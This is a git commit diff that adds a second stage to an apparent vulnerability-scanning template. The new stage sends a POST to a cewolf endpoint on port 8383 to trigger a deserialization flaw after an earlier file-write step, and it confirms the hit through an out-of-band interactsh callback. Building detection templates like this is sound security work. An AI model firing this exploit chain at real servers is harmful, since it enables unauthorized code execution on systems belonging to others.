Add Stage 2

Stage 2 triggers the deserialization vulnerability in `getChartImage()`.
patch-4
Alexander King 2024-04-30 13:13:14 -05:00
parent 4be597880b
commit 825b9fbed4
No known key found for this signature in database
GPG Key ID: 45E3E02677F6A026
1 changed files with 17 additions and 0 deletions

View File

@ -39,6 +39,7 @@ http:
- type: dsl
dsl:
- compare_versions(version, '<10.0.474')
# arbitrary file write
- method: POST
headers:
@ -53,3 +54,19 @@ http:
- type: status
status:
- 200
# deserialization
- method: POST
path:
- "https://{Host}:8383/cewolf/{{File}}?img=\\logger.zip"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: interactsh_protocol
words:
- "http"